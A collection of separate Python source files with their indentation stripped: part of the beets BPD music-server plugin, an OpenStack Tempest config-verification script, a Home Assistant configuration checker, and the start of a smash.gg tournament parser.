command_re = re.compile(br'^([^ \t]+)[ \t]*')
arg_re = re.compile(br'"((?:\\"|[^"])+)"|([^ \t"]+)')
def __init__(self, s):
"""Creates a new `Command` from the given string, `s`, parsing
the string for command name and arguments.
"""
command_match = self.command_re.match(s)
self.name = command_match.group(1)
self.args = []
arg_matches = self.arg_re.findall(s[command_match.end():])
for match in arg_matches:
if match[0]:
# Quoted argument.
arg = match[0]
arg = arg.replace(b'\\"', b'"').replace(b'\\\\', b'\\')
else:
# Unquoted argument.
arg = match[1]
arg = arg.decode('utf8')
self.args.append(arg)
def run(self, conn):
"""A coroutine that executes the command on the given
connection.
"""
# Attempt to get correct command function.
func_name = 'cmd_' + self.name
if not hasattr(conn.server, func_name):
raise BPDError(ERROR_UNKNOWN, u'unknown command', self.name)
func = getattr(conn.server, func_name)
# Ensure we have permission for this command.
if conn.server.password and \
not conn.authenticated and \
self.name not in SAFE_COMMANDS:
raise BPDError(ERROR_PERMISSION, u'insufficient privileges')
try:
args = [conn] + self.args
results = func(*args)
if results:
for data in results:
yield conn.send(data)
except BPDError as e:
# An exposed error. Set the command name and then let
# the Connection handle it.
e.cmd_name = self.name
raise e
except BPDClose:
# An indication that the connection should close. Send
# it on the Connection.
raise
except Exception as e:
# An "unintentional" error. Hide it from the client.
log.error('{}', traceback.format_exc(e))
raise BPDError(ERROR_SYSTEM, u'server error', self.name)
class CommandList(list):
"""A list of commands issued by the client for processing by the
server. May be verbose, in which case the response is delimited, or
not. Should be a list of `Command` objects.
"""
def __init__(self, sequence=None, verbose=False):
"""Create a new `CommandList` from the given sequence of
`Command`s. If `verbose`, this is a verbose command list.
"""
if sequence:
for item in sequence:
self.append(item)
self.verbose = verbose
def run(self, conn):
"""Coroutine executing all the commands in this list.
"""
for i, command in enumerate(self):
try:
yield bluelet.call(command.run(conn))
except BPDError as e:
# If the command failed, stop executing.
e.index = i # Give the error the correct index.
raise e
# Otherwise, possibly send the output delimeter if we're in a
# verbose ("OK") command list.
if self.verbose:
yield conn.send(RESP_CLIST_VERBOSE)
# A subclass of the basic, protocol-handling server that actually plays
# music.
class Server(BaseServer):
"""An MPD-compatible server using GStreamer to play audio and beets
to store its library.
"""
def __init__(self, library, host, port, password):
try:
from beetsplug.bpd import gstplayer
except ImportError as e:
# This is a little hacky, but it's the best I know for now.
if e.args[0].endswith(' gst'):
raise NoGstreamerError()
else:
raise
super(Server, self).__init__(host, port, password)
self.lib = library
self.player = gstplayer.GstPlayer(self.play_finished)
self.cmd_update(None)
def run(self):
self.player.run()
super(Server, self).run()
def play_finished(self):
"""A callback invoked every time our player finishes a
track.
"""
self.cmd_next(None)
# Metadata helper functions.
def _item_info(self, item):
info_lines = [
u'file: ' + item.destination(fragment=True),
u'Time: ' + unicode(int(item.length)),
u'Title: ' + item.title,
u'Artist: ' + item.artist,
u'Album: ' + item.album,
u'Genre: ' + item.genre,
]
track = unicode(item.track)
if item.tracktotal:
track += u'/' + unicode(item.tracktotal)
info_lines.append(u'Track: ' + track)
info_lines.append(u'Date: ' + unicode(item.year))
try:
pos = self._id_to_index(item.id)
info_lines.append(u'Pos: ' + unicode(pos))
except ArgumentNotFoundError:
# Don't include position if not in playlist.
pass
info_lines.append(u'Id: ' + unicode(item.id))
return info_lines
def _item_id(self, item):
return item.id
# Database updating.
def cmd_update(self, conn, path=u'/'):
"""Updates the catalog to reflect the current database state.
"""
# Path is ignored. Also, the real MPD does this asynchronously;
# this is done inline.
print('Building directory tree...')
self.tree = vfs.libtree(self.lib)
print('... done.')
self.updated_time = time.time()
# Path (directory tree) browsing.
def _resolve_path(self, path):
"""Returns a VFS node or an item ID located at the path given.
If the path does not exist, raises a
"""
components = path.split(u'/')
node = self.tree
for component in components:
if not component:
continue
if isinstance(node, int):
# We're trying to descend into a file node.
raise ArgumentNotFoundError()
if component in node.files:
node = node.files[component]
elif component in node.dirs:
node = node.dirs[component]
else:
raise ArgumentNotFoundError()
return node
def _path_join(self, p1, p2):
"""Smashes together two BPD paths."""
out = p1 + u'/' + p2
return out.replace(u'//', u'/').replace(u'//', u'/')
def cmd_lsinfo(self, conn, path=u"/"):
"""Sends info on all the items in the path."""
node = self._resolve_path(path)
if isinstance(node, int):
# Trying to list a track.
raise BPDError(ERROR_ARG, 'this is not a directory')
else:
for name, itemid in iter(sorted(node.files.items())):
item = self.lib.get_item(itemid)
yield self._item_info(item)
for name, _ in iter(sorted(node.dirs.iteritems())):
dirpath = self._path_join(path, name)
if dirpath.startswith(u"/"):
# Strip leading slash (libmpc rejects this).
dirpath = dirpath[1:]
yield u'directory: %s' % dirpath
def _listall(self, basepath, node, info=False):
"""Helper function for recursive listing. If info, show
tracks' complete info; otherwise, just show items' paths.
"""
if isinstance(node, int):
# List a single file.
if info:
item = self.lib.get_item(node)
yield self._item_info(item)
else:
yield u'file: ' + basepath
else:
# List a directory. Recurse into both directories and files.
for name, itemid in sorted(node.files.iteritems()):
newpath = self._path_join(basepath, name)
# "yield from"
for v in self._listall(newpath, itemid, info):
yield v
for name, subdir in sorted(node.dirs.iteritems()):
newpath = self._path_join(basepath, name)
yield u'directory: ' + newpath
for v in self._listall(newpath, subdir, info):
yield v
def cmd_listall(self, conn, path=u"/"):
"""Send the paths all items in the directory, recursively."""
return self._listall(path, self._resolve_path(path), False)
def cmd_listallinfo(self, conn, path=u"/"):
"""Send info on all the items in the directory, recursively."""
return self._listall(path, self._resolve_path(path), True)
# Playlist manipulation.
def _all_items(self, node):
"""Generator yielding all items under a VFS node.
"""
if isinstance(node, int):
# Could be more efficient if we built up all the IDs and
# then issued a single SELECT.
yield self.lib.get_item(node)
else:
# Recurse into a directory.
for name, itemid in sorted(node.files.iteritems()):
# "yield from"
for v in self._all_items(itemid):
yield v
for name, subdir in sorted(node.dirs.iteritems()):
for v in self._all_items(subdir):
yield v
def _add(self, path, send_id=False):
"""Adds a track or directory to the playlist, specified by the
path. If `send_id`, write each item's id to the client.
"""
for item in self._all_items(self._resolve_path(path)):
self.playlist.append(item)
if send_id:
yield u'Id: ' + unicode(item.id)
self.playlist_version += 1
def cmd_add(self, conn, path):
"""Adds a track or directory to the playlist, specified by a
path.
"""
return self._add(path, False)
def cmd_addid(self, conn, path):
"""Same as `cmd_add` but sends an id back to the client."""
return self._add(path, True)
# Server info.
def cmd_status(self, conn):
for line in super(Server, self).cmd_status(conn):
yield line
if self.current_index > -1:
item = self.playlist[self.current_index]
yield u'bitrate: ' + unicode(item.bitrate / 1000)
# Missing 'audio'.
(pos, total) = self.player.time()
yield u'time: ' + unicode(pos) + u':' + unicode(total)
# Also missing 'updating_db'.
def cmd_stats(self, conn):
"""Sends some statistics about the library."""
with self.lib.transaction() as tx:
statement = 'SELECT COUNT(DISTINCT artist), ' \
'COUNT(DISTINCT album), ' \
'COUNT(id), ' \
'SUM(length) ' \
'FROM items'
artists, albums, songs, totaltime = tx.query(statement)[0]
yield (
u'artists: ' + unicode(artists),
u'albums: ' + unicode(albums),
u'songs: ' + unicode(songs),
u'uptime: ' + unicode(int(time.time() - self.startup_time)),
u'playtime: ' + u'0', # Missing.
u'db_playtime: ' + unicode(int(totaltime)),
u'db_update: ' + unicode(int(self.updated_time)),
)
# Searching.
tagtype_map = {
u'Artist': u'artist',
u'Album': u'album',
u'Title': u'title',
u'Track': u'track',
u'AlbumArtist': u'albumartist',
u'AlbumArtistSort': u'albumartist_sort',
# Name?
u'Genre': u'genre',
u'Date': u'year',
u'Composer': u'composer',
# Performer?
u'Disc': u'disc',
u'filename': u'path', # Suspect.
}
def cmd_tagtypes(self, conn):
"""Returns a list of the metadata (tag) fields available for
searching.
"""
for tag in self.tagtype_map:
yield u'tagtype: ' + tag
def _tagtype_lookup(self, tag):
"""Uses `tagtype_map` to look up the beets column name for an
MPD tagtype (or throw an appropriate exception). Returns both
the canonical name of the MPD tagtype and the beets column
name.
"""
for test_tag, key in self.tagtype_map.items():
# Match case-insensitively.
if test_tag.lower() == tag.lower():
return test_tag, key
raise BPDError(ERROR_UNKNOWN, u'no such tagtype')
def _metadata_query(self, query_type, any_query_type, kv):
"""Helper function returns a query object that will find items
according to the library query type provided and the key-value
pairs specified. The any_query_type is used for queries of
type "any"; if None, then an error is thrown.
"""
if kv: # At least one key-value pair.
queries = []
# Iterate pairwise over the arguments.
it = iter(kv)
for tag, value in zip(it, it):
if tag.lower() == u'any':
if any_query_type:
queries.append(any_query_type(value,
ITEM_KEYS_WRITABLE,
query_type))
else:
raise BPDError(ERROR_UNKNOWN, u'no such tagtype')
else:
_, key = self._tagtype_lookup(tag)
queries.append(query_type(key, value))
return dbcore.query.AndQuery(queries)
else: # No key-value pairs.
return dbcore.query.TrueQuery()
def cmd_search(self, conn, *kv):
"""Perform a substring match for items."""
query = self._metadata_query(dbcore.query.SubstringQuery,
dbcore.query.AnyFieldQuery,
kv)
for item in self.lib.items(query):
yield self._item_info(item)
def cmd_find(self, conn, *kv):
"""Perform an exact match for items."""
query = self._metadata_query(dbcore.query.MatchQuery,
None,
kv)
for item in self.lib.items(query):
yield self._item_info(item)
def cmd_list(self, conn, show_tag, *kv):
"""List distinct metadata values for show_tag, possibly
filtered by matching match_tag to match_term.
"""
show_tag_canon, show_key = self._tagtype_lookup(show_tag)
query = self._metadata_query(dbcore.query.MatchQuery, None, kv)
clause, subvals = query.clause()
statement = 'SELECT DISTINCT ' + show_key + \
' FROM items WHERE ' + clause + \
' ORDER BY ' + show_key
with self.lib.transaction() as tx:
rows = tx.query(statement, subvals)
for row in rows:
yield show_tag_canon + u': ' + unicode(row[0])
def cmd_count(self, conn, tag, value):
"""Returns the number and total time of songs matching the
tag/value query.
"""
_, key = self._tagtype_lookup(tag)
songs = 0
playtime = 0.0
for item in self.lib.items(dbcore.query.MatchQuery(key, value)):
songs += 1
playtime += item.length
yield u'songs: ' + unicode(songs)
yield u'playtime: ' + unicode(int(playtime))
# "Outputs." Just a dummy implementation because we don't control
# any outputs.
def cmd_outputs(self, conn):
"""List the available outputs."""
yield (
u'outputid: 0',
u'outputname: gstreamer',
u'outputenabled: 1',
)
def cmd_enableoutput(self, conn, output_id):
output_id = cast_arg(int, output_id)
if output_id != 0:
raise ArgumentIndexError()
def cmd_disableoutput(self, conn, output_id):
output_id = cast_arg(int, output_id)
if output_id == 0:
raise BPDError(ERROR_ARG, u'cannot disable this output')
else:
raise ArgumentIndexError()
# Playback control. The functions below hook into the
# half-implementations provided by the base class. Together, they're
# enough to implement all normal playback functionality.
def cmd_play(self, conn, index=-1):
new_index = index != -1 and index != self.current_index
was_paused = self.paused
super(Server, self).cmd_play(conn, index)
if self.current_index > -1: # Not stopped.
if was_paused and not new_index:
# Just unpause.
self.player.play()
else:
self.player.play_file(self.playlist[self.current_index].path)
def cmd_pause(self, conn, state=None):
super(Server, self).cmd_pause(conn, state)
if self.paused:
self.player.pause()
elif self.player.playing:
self.player.play()
def cmd_stop(self, conn):
super(Server, self).cmd_stop(conn)
self.player.stop()
def cmd_seek(self, conn, index, pos):
"""Seeks to the specified position in the specified song."""
index = cast_arg(int, index)
pos = cast_arg(int, pos)
super(Server, self).cmd_seek(conn, index, pos)
self.player.seek(pos)
# Volume control.
def cmd_setvol(self, conn, vol):
vol = cast_arg(int, vol)
super(Server, self).cmd_setvol(conn, vol)
self.player.volume = float(vol) / 100
# Beets plugin hooks.
class BPDPlugin(BeetsPlugin):
"""Provides the "beet bpd" command for running a music player
server.
"""
def __init__(self):
super(BPDPlugin, self).__init__()
self.config.add({
'host': u'',
'port': 6600,
'password': u'',
'volume': VOLUME_MAX,
})
self.config['password'].redact = True
def start_bpd(self, lib, host, port, password, volume, debug):
"""Starts a BPD server."""
if debug: # FIXME this should be managed by BeetsPlugin
self._log.setLevel(logging.DEBUG)
else:
self._log.setLevel(logging.WARNING)
try:
server = Server(lib, host, port, password)
server.cmd_setvol(None, volume)
server.run()
except NoGstreamerError:
global_log.error(u'Gstreamer Python bindings not found.')
global_log.error(u'Install "python-gst0.10", "py27-gst-python", '
u'or similar package to use BPD.')
def commands(self):
cmd = beets.ui.Subcommand(
'bpd', help='run an MPD-compatible music player server'
)
cmd.parser.add_option(
'-d', '--debug', action='store_true',
help='dump all MPD traffic to stdout'
)
def func(lib, opts, args):
host = args.pop(0) if args else self.config['host'].get(unicode)
port = args.pop(0) if args else self.config['port'].get(int)
if args:
raise beets.ui.UserError('too many arguments')
password = self.config['password'].get(unicode)
volume = self.config['volume'].get(int)
debug = opts.debug or False
self.start_bpd(lib, host, int(port), password, volume, debug)
cmd.func = func
return [cmd]
|
|
#!/usr/bin/env python
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import os
import sys
import httplib2
from oslo_serialization import jsonutils as json
from six import moves
from six.moves.urllib import parse as urlparse
from tempest import clients
from tempest.common import credentials
from tempest import config
CONF = config.CONF
CONF_PARSER = None
def _get_config_file():
default_config_dir = os.path.join(os.path.abspath(
os.path.dirname(os.path.dirname(os.path.dirname(__file__)))), "etc")
default_config_file = "tempest.conf"
conf_dir = os.environ.get('TEMPEST_CONFIG_DIR', default_config_dir)
conf_file = os.environ.get('TEMPEST_CONFIG', default_config_file)
path = os.path.join(conf_dir, conf_file)
fd = open(path, 'rw')
return fd
def change_option(option, group, value):
if not CONF_PARSER.has_section(group):
CONF_PARSER.add_section(group)
CONF_PARSER.set(group, option, str(value))
def print_and_or_update(option, group, value, update):
print('Config option %s in group %s should be changed to: %s'
% (option, group, value))
if update:
change_option(option, group, value)
def contains_version(prefix, versions):
return any([x for x in versions if x.startswith(prefix)])
def verify_glance_api_versions(os, update):
# Check glance api versions
_, versions = os.image_client.get_versions()
if CONF.image_feature_enabled.api_v1 != contains_version('v1.', versions):
print_and_or_update('api_v1', 'image-feature-enabled',
not CONF.image_feature_enabled.api_v1, update)
if CONF.image_feature_enabled.api_v2 != contains_version('v2.', versions):
print_and_or_update('api_v2', 'image-feature-enabled',
not CONF.image_feature_enabled.api_v2, update)
def _get_unversioned_endpoint(base_url):
endpoint_parts = urlparse.urlparse(base_url)
endpoint = endpoint_parts.scheme + '://' + endpoint_parts.netloc
return endpoint
def _get_api_versions(os, service):
client_dict = {
'nova': os.servers_client,
'keystone': os.identity_client,
'cinder': os.volumes_client,
}
client_dict[service].skip_path()
endpoint = _get_unversioned_endpoint(client_dict[service].base_url)
dscv = CONF.identity.disable_ssl_certificate_validation
ca_certs = CONF.identity.ca_certificates_file
raw_http = httplib2.Http(disable_ssl_certificate_validation=dscv,
ca_certs=ca_certs)
__, body = raw_http.request(endpoint, 'GET')
client_dict[service].reset_path()
body = json.loads(body)
if service == 'keystone':
versions = map(lambda x: x['id'], body['versions']['values'])
else:
versions = map(lambda x: x['id'], body['versions'])
return list(versions)
def verify_keystone_api_versions(os, update):
# Check keystone api versions
versions = _get_api_versions(os, 'keystone')
if (CONF.identity_feature_enabled.api_v2 !=
contains_version('v2.', versions)):
print_and_or_update('api_v2', 'identity-feature-enabled',
not CONF.identity_feature_enabled.api_v2, update)
if (CONF.identity_feature_enabled.api_v3 !=
contains_version('v3.', versions)):
print_and_or_update('api_v3', 'identity-feature-enabled',
not CONF.identity_feature_enabled.api_v3, update)
def verify_cinder_api_versions(os, update):
# Check cinder api versions
versions = _get_api_versions(os, 'cinder')
if (CONF.volume_feature_enabled.api_v1 !=
contains_version('v1.', versions)):
print_and_or_update('api_v1', 'volume-feature-enabled',
not CONF.volume_feature_enabled.api_v1, update)
if (CONF.volume_feature_enabled.api_v2 !=
contains_version('v2.', versions)):
print_and_or_update('api_v2', 'volume-feature-enabled',
not CONF.volume_feature_enabled.api_v2, update)
def verify_api_versions(os, service, update):
verify = {
'cinder': verify_cinder_api_versions,
'glance': verify_glance_api_versions,
'keystone': verify_keystone_api_versions,
}
if service not in verify:
return
verify[service](os, update)
def get_extension_client(os, service):
extensions_client = {
'nova': os.extensions_client,
'cinder': os.volumes_extension_client,
'neutron': os.network_client,
'swift': os.account_client,
}
# NOTE (e0ne): Use Cinder API v2 by default because v1 is deprecated
if CONF.volume_feature_enabled.api_v2:
extensions_client['cinder'] = os.volumes_v2_extension_client
else:
extensions_client['cinder'] = os.volumes_extension_client
if service not in extensions_client:
print('No tempest extensions client for %s' % service)
exit(1)
return extensions_client[service]
def get_enabled_extensions(service):
extensions_options = {
'nova': CONF.compute_feature_enabled.api_extensions,
'cinder': CONF.volume_feature_enabled.api_extensions,
'neutron': CONF.network_feature_enabled.api_extensions,
'swift': CONF.object_storage_feature_enabled.discoverable_apis,
}
if service not in extensions_options:
print('No supported extensions list option for %s' % service)
exit(1)
return extensions_options[service]
def verify_extensions(os, service, results):
extensions_client = get_extension_client(os, service)
if service != 'swift':
resp = extensions_client.list_extensions()
else:
__, resp = extensions_client.list_extensions()
# For Nova, Cinder and Neutron we use the alias name rather than the
# 'name' field because the alias is considered to be the canonical
# name.
if isinstance(resp, dict):
if service == 'swift':
# Remove Swift general information from extensions list
resp.pop('swift')
extensions = resp.keys()
else:
extensions = map(lambda x: x['alias'], resp['extensions'])
else:
extensions = map(lambda x: x['alias'], resp)
extensions = list(extensions)
if not results.get(service):
results[service] = {}
extensions_opt = get_enabled_extensions(service)
if extensions_opt[0] == 'all':
results[service]['extensions'] = extensions
return results
# Verify that all configured extensions are actually enabled
for extension in extensions_opt:
results[service][extension] = extension in extensions
# Verify that there aren't additional extensions enabled that aren't
# specified in the config list
for extension in extensions:
if extension not in extensions_opt:
results[service][extension] = False
return results
def display_results(results, update, replace):
update_dict = {
'swift': 'object-storage-feature-enabled',
'nova': 'compute-feature-enabled',
'cinder': 'volume-feature-enabled',
'neutron': 'network-feature-enabled',
}
for service in results:
# If all extensions are specified as being enabled there is no way to
# verify this so we just assume this to be true
if results[service].get('extensions'):
if replace:
output_list = results[service].get('extensions')
else:
output_list = ['all']
else:
extension_list = get_enabled_extensions(service)
output_list = []
for extension in results[service]:
if not results[service][extension]:
if extension in extension_list:
print("%s extension: %s should not be included in the "
"list of enabled extensions" % (service,
extension))
else:
print("%s extension: %s should be included in the list"
" of enabled extensions" % (service, extension))
output_list.append(extension)
else:
output_list.append(extension)
if update:
# Sort List
output_list.sort()
# Convert list to a string
output_string = ', '.join(output_list)
if service == 'swift':
change_option('discoverable_apis', update_dict[service],
output_string)
else:
change_option('api_extensions', update_dict[service],
output_string)
def check_service_availability(os, update):
services = []
avail_services = []
codename_match = {
'volume': 'cinder',
'network': 'neutron',
'image': 'glance',
'object_storage': 'swift',
'compute': 'nova',
'orchestration': 'heat',
'metering': 'ceilometer',
'telemetry': 'ceilometer',
'data_processing': 'sahara',
'baremetal': 'ironic',
'identity': 'keystone',
'messaging': 'zaqar',
'database': 'trove'
}
# Get catalog list for endpoints to use for validation
_token, auth_data = os.auth_provider.get_auth()
if os.auth_version == 'v2':
catalog_key = 'serviceCatalog'
else:
catalog_key = 'catalog'
for entry in auth_data[catalog_key]:
services.append(entry['type'])
# Pull all catalog types from config file and compare against endpoint list
for cfgname in dir(CONF._config):
cfg = getattr(CONF, cfgname)
catalog_type = getattr(cfg, 'catalog_type', None)
if not catalog_type:
continue
else:
if cfgname == 'identity':
# Keystone is a required service for tempest
continue
if catalog_type not in services:
if getattr(CONF.service_available, codename_match[cfgname]):
print('Endpoint type %s not found either disable service '
'%s or fix the catalog_type in the config file' % (
catalog_type, codename_match[cfgname]))
if update:
change_option(codename_match[cfgname],
'service_available', False)
else:
if not getattr(CONF.service_available,
codename_match[cfgname]):
print('Endpoint type %s is available, service %s should be'
' set as available in the config file.' % (
catalog_type, codename_match[cfgname]))
if update:
change_option(codename_match[cfgname],
'service_available', True)
# If we are going to enable this we should allow
# extension checks.
avail_services.append(codename_match[cfgname])
else:
avail_services.append(codename_match[cfgname])
return avail_services
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--update', action='store_true',
help='Update the config file with results from api '
'queries. This assumes whatever is set in the '
'config file is incorrect. In the case of '
'endpoint checks where it could either be the '
'incorrect catalog type or the service available '
'option the service available option is assumed '
'to be incorrect and is thus changed')
parser.add_argument('-o', '--output',
help="Output file to write an updated config file to. "
"This has to be a separate file from the "
"original config file. If one isn't specified "
"with -u the new config file will be printed to "
"STDOUT")
parser.add_argument('-r', '--replace-ext', action='store_true',
help="If specified the all option will be replaced "
"with a full list of extensions")
args = parser.parse_args()
return args
def main():
print('Running config verification...')
opts = parse_args()
update = opts.update
replace = opts.replace_ext
global CONF_PARSER
outfile = sys.stdout
if update:
conf_file = _get_config_file()
if opts.output:
outfile = open(opts.output, 'w+')
CONF_PARSER = moves.configparser.SafeConfigParser()
CONF_PARSER.optionxform = str
CONF_PARSER.readfp(conf_file)
icreds = credentials.get_credentials_provider('verify_tempest_config')
try:
os = clients.Manager(icreds.get_primary_creds())
services = check_service_availability(os, update)
results = {}
for service in ['nova', 'cinder', 'neutron', 'swift']:
if service not in services:
continue
results = verify_extensions(os, service, results)
# Verify API versions of all services in the keystone catalog and
# keystone itself.
services.append('keystone')
for service in services:
verify_api_versions(os, service, update)
display_results(results, update, replace)
if update:
conf_file.close()
CONF_PARSER.write(outfile)
outfile.close()
finally:
icreds.clear_creds()
if __name__ == "__main__":
main()
|
|
"""Helper to check the configuration file."""
from __future__ import annotations
from collections import OrderedDict
import logging
import os
from pathlib import Path
from typing import List, NamedTuple, Optional
import voluptuous as vol
from homeassistant import loader
from homeassistant.config import (
CONF_CORE,
CONF_PACKAGES,
CORE_CONFIG_SCHEMA,
YAML_CONFIG_FILE,
_format_config_error,
config_per_platform,
extract_domain_configs,
load_yaml_config_file,
merge_packages_config,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.typing import ConfigType
from homeassistant.requirements import (
RequirementsNotFound,
async_get_integration_with_requirements,
)
import homeassistant.util.yaml.loader as yaml_loader
class CheckConfigError(NamedTuple):
"""Configuration check error."""
message: str
domain: Optional[str]
config: Optional[ConfigType]
class HomeAssistantConfig(OrderedDict):
"""Configuration result with errors attribute."""
def __init__(self) -> None:
"""Initialize HA config."""
super().__init__()
self.errors: List[CheckConfigError] = []
def add_error(
self,
message: str,
domain: Optional[str] = None,
config: Optional[ConfigType] = None,
) -> HomeAssistantConfig:
"""Add a single error."""
self.errors.append(CheckConfigError(str(message), domain, config))
return self
@property
def error_str(self) -> str:
"""Return errors as a string."""
return "\n".join([err.message for err in self.errors])
async def async_check_ha_config_file(hass: HomeAssistant) -> HomeAssistantConfig:
"""Load and check if Home Assistant configuration file is valid.
This method is a coroutine.
"""
result = HomeAssistantConfig()
def _pack_error(
package: str, component: str, config: ConfigType, message: str
) -> None:
"""Handle errors from packages: _log_pkg_error."""
message = f"Package {package} setup failed. Component {component} {message}"
domain = f"homeassistant.packages.{package}.{component}"
pack_config = core_config[CONF_PACKAGES].get(package, config)
result.add_error(message, domain, pack_config)
def _comp_error(ex: Exception, domain: str, config: ConfigType) -> None:
"""Handle errors from components: async_log_exception."""
result.add_error(_format_config_error(ex, domain, config)[0], domain, config)
# Load configuration.yaml
config_path = hass.config.path(YAML_CONFIG_FILE)
try:
if not await hass.async_add_executor_job(os.path.isfile, config_path):
return result.add_error("File configuration.yaml not found.")
assert hass.config.config_dir is not None
config = await hass.async_add_executor_job(
load_yaml_config_file,
config_path,
yaml_loader.Secrets(Path(hass.config.config_dir)),
)
except FileNotFoundError:
return result.add_error(f"File not found: {config_path}")
except HomeAssistantError as err:
return result.add_error(f"Error loading {config_path}: {err}")
# Extract and validate core [homeassistant] config
try:
core_config = config.pop(CONF_CORE, {})
core_config = CORE_CONFIG_SCHEMA(core_config)
result[CONF_CORE] = core_config
except vol.Invalid as err:
result.add_error(err, CONF_CORE, core_config)
core_config = {}
# Merge packages
await merge_packages_config(
hass, config, core_config.get(CONF_PACKAGES, {}), _pack_error
)
core_config.pop(CONF_PACKAGES, None)
# Filter out repeating config sections
components = {key.split(" ")[0] for key in config.keys()}
# Process and validate config
for domain in components:
try:
integration = await async_get_integration_with_requirements(hass, domain)
except (RequirementsNotFound, loader.IntegrationNotFound) as ex:
result.add_error(f"Component error: {domain} - {ex}")
continue
try:
component = integration.get_component()
except ImportError as ex:
result.add_error(f"Component error: {domain} - {ex}")
continue
# Check if the integration has a custom config validator
config_validator = None
try:
config_validator = integration.get_platform("config")
except ImportError as err:
# Filter out import error of the config platform.
# If the config platform contains bad imports, make sure
# that still fails.
if err.name != f"{integration.pkg_path}.config":
result.add_error(f"Error importing config platform {domain}: {err}")
continue
if config_validator is not None and hasattr(
config_validator, "async_validate_config"
):
try:
result[domain] = (
await config_validator.async_validate_config( # type: ignore
hass, config
)
)[domain]
continue
except (vol.Invalid, HomeAssistantError) as ex:
_comp_error(ex, domain, config)
continue
except Exception as err: # pylint: disable=broad-except
logging.getLogger(__name__).exception(
"Unexpected error validating config"
)
result.add_error(
f"Unexpected error calling config validator: {err}",
domain,
config.get(domain),
)
continue
config_schema = getattr(component, "CONFIG_SCHEMA", None)
if config_schema is not None:
try:
config = config_schema(config)
result[domain] = config[domain]
except vol.Invalid as ex:
_comp_error(ex, domain, config)
continue
component_platform_schema = getattr(
component,
"PLATFORM_SCHEMA_BASE",
getattr(component, "PLATFORM_SCHEMA", None),
)
if component_platform_schema is None:
continue
platforms = []
for p_name, p_config in config_per_platform(config, domain):
# Validate component specific platform schema
try:
p_validated = component_platform_schema(p_config)
except vol.Invalid as ex:
_comp_error(ex, domain, config)
continue
# Not all platform components follow same pattern for platforms
# So if p_name is None we are not going to validate platform
# (the automation component is one of them)
if p_name is None:
platforms.append(p_validated)
continue
try:
p_integration = await async_get_integration_with_requirements(
hass, p_name
)
platform = p_integration.get_platform(domain)
except (
loader.IntegrationNotFound,
RequirementsNotFound,
ImportError,
) as ex:
result.add_error(f"Platform error {domain}.{p_name} - {ex}")
continue
# Validate platform specific schema
platform_schema = getattr(platform, "PLATFORM_SCHEMA", None)
if platform_schema is not None:
try:
p_validated = platform_schema(p_validated)
except vol.Invalid as ex:
_comp_error(ex, f"{domain}.{p_name}", p_validated)
continue
platforms.append(p_validated)
# Remove config for current component and add validated config back in.
for filter_comp in extract_domain_configs(config, domain):
del config[filter_comp]
result[domain] = platforms
return result
|
|
import sys
sys.path.insert(0,'..')
sys.path.insert(0,'../sanitize')
from app.models import *
import urllib3
import json
import requests
from pprint import pprint
from date_utils import *
from trueskill_functions import *
from misc_utils import print_ignore
# To be converted into TournamentHeader objects
class TournamentInfo:
'''
Object to carry tournament information across functions
'''
parent=""
title=""
host=""
public_url=""
url=""
entrants=0
game_type=""
bracket_type=""
def __init__(self, id, name, region, date):
self.id = id
self.name = name
self.region = region
self.date = date
def __str__(self):
return 'TournamentInfo(id=%s, parent=%s, name=%s, region=%s, date=%s, title=%s, host=%s, \
public_url=%s, url=%s, entrants=%s, bracket_type=%s, game_type=%s)' % (self.id, self.parent, self.name, self.region,
self.date, self.title, self.host, self.public_url, self.url, self.entrants, self.bracket_type, self.game_type)
class SubBracket:
'''
Object to carry SubBracket info
'''
phase_id = 0
wave_id = 0
name = ""
url = ""
def __init__(self, id):
self.id = id
def __str__(self):
return 'SubBracket(id=%s, phase_id=%s, wave_id=%s, name=%s, url=%s)' % \
(self.id, self.phase_id, self.wave_id, self.name, self.url)
class EntrantInfo:
'''
Object to carry Entrant info
'''
entrant_id = 0
entrant_name = ""
player_tag = ""
player_prefix = ""
player_id = 0
player_region = ""
player_country = ""
player_state = ""
player_sub_seed = ""
player_super_seed = ""
player_sub_placing = ""
player_super_placing = ""
def __init__(self, id, entrant_name):
# Unique to current tournament
self.entrant_id = id
self.entrant_name = entrant_name
def __str__(self):
return 'EntrantInfo(entrant_id=%s, entrant_name=%s, player_tag=%s, player_prefix=%s, player_id=%s, player_region=%s, player_country=%s, player_state=%s, player_sub_seed=%s, player_super_seed=%s, player_sub_placing=%s, player_super_placing=%s)' % \
(self.entrant_id, self.entrant_name, self.player_tag, self.player_prefix, self.player_id, self.player_region, self.player_country, self.player_state, self.player_sub_seed, self.player_super_seed, self.player_sub_placing, self.player_super_placing)
class SetInfo:
'''
Object to carry Set info
'''
id = 0
round_number = 0
round_text = ""
best_of = 0
winner_id = 0
loser_id = 0
winner_tag = ""
loser_tag = ""
winner_score = 0
loser_score = 0
total_matches = winner_score+loser_score
def __init__(self, id):
self.id = id
def __str__(self):
return 'SetInfo(id=%s, round_number=%s, round_text=%s, best_of=%s, winner_id=%s, loser_id=%s, winner_tag=%s, loser_tag=%s, winner_score=%s, loser_score=%s, total_matches=%s)' % \
(self.id, self.round_number, self.round_text, self.best_of, self.winner_id, self.loser_id, self.winner_tag, self.loser_tag, self.winner_score, self.loser_score, self.total_matches)
# Gets the tournament header info and stores it in TournamentInfo object
def parse_tournament_info(tournament_id, tournament_url, tournament_name, tournament_region, tournament_date):
info_url = "https://api.smash.gg/event/" + tournament_id
info = requests.get(info_url)
info_json = info.json()
# pprint(info_json)
tournament_info = TournamentInfo(tournament_id, tournament_name, tournament_region, tournament_date)
if info_json['entities']['event'].get("startedAt") is not None:
tournament_info.date = convert_int_date(info_json['entities']['event'].get("startedAt"))
else:
tournament_info.date = convert_int_date(tournament_date)
tournament_info.public_url = tournament_url
tournament_info.game_type = info_json['entities']['event'].get("typeDisplayStr")
tournament_info.title = info_json['entities']['event'].get("slug")
tournament_info.url = info_url
print "\n---TOURNAMENT INFO---\n", tournament_info
return tournament_info
